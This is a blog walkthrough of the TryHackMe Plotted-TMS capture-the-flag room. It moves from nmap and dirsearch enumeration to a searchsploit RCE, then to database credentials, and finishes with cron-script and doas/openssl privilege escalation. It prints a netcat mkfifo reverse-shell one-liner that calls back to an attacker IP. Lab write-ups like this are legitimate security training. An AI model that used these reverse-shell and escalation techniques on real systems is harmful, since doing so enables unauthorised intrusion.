<BACK TO BLOG

Article Image

Plotted-TMS TryHackMe

Let’s take a look at the Plotted-TMS CTF on TryHackMe Created by @sa.infinity8888.

Enumeration

Nmap Scan

The first step of my enumeration was a scan with nmap. by the command:

sudo nmap 10.10.123.136 -sC -sS -Pn

The “Nmap Output” displayed 3 service running under port 80, 445 and 22. Nmap

Dirsearch Scan

I next decided to run a Dirsearch scan on the webserver to see if there were any interesting hidden directories, by the command: disearch1

After we've completed our scan, we see idRSA And with the help of CyberChef we found :

Trust me it is not this easy..now get back to enumeration :D

And we also found : passwd That means:

not this easy :D

And Now I run the scan in the the webserver that is on port 445: Nmap

And we found: landing login

Exploiting

Now let’s look for exploits that we can use.

searchsploit Traffic Offence Management System

Searchsploit The Output displayed that there's RCE: Remote Code Execution, SQLi: SQL Injection, XSS: Cross-site scripting. And I've decide to go with the RCE vulnerability: getExploit

And I modify the Exploit to: modify

So it successfully did a RCE and uploaded a shell on the host : done

And I tried ls command on it: testLS

Reverse Shell

I set up my netcat listener on port 4444 and I fired up Burp and sent a POST request with the following encoded payload using URL encoding:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.174.180 4444 >/tmp/f

burp

Great! I received a reverse connection on my port 4444. And I've upgraded the shell: shell

Database Discovery

Now we're in the machine and I decided to take a look at the initialize.php file which gave me the username and the password for accessing the database: initPHP

Then I tried to connect to the database using the credentials of last file. And I found some Password Hashs: mysql1 mysql2

User Flag

Inside the home directory of the plot_admin user. I notice a file called user.txt but I didn't have the rights to access it. permDenied

As I was exploring I tried to look at the contab file: crontab

Interesting we found a script called backup. crontab

Then I tried to remove the original backup script and rewrite another one that will help me get a reverse shell with reverse-shell-generator: backup2

And when I run date command I got a shell on my listner, and I got the flag: userFLAG

Root Flag

Now it’s time to escalate our privileges and get the root flag. SUDO1 SUDO2

So as a result of find / -perm -u=s -type f 2>/dev/null we found that we can run doas as root. And after some research I found that I can only openssl with the root privilege and I followed the steps of GTFObins : SUDO2

Thanks for reading!!!

Reda BELHAJ

––– views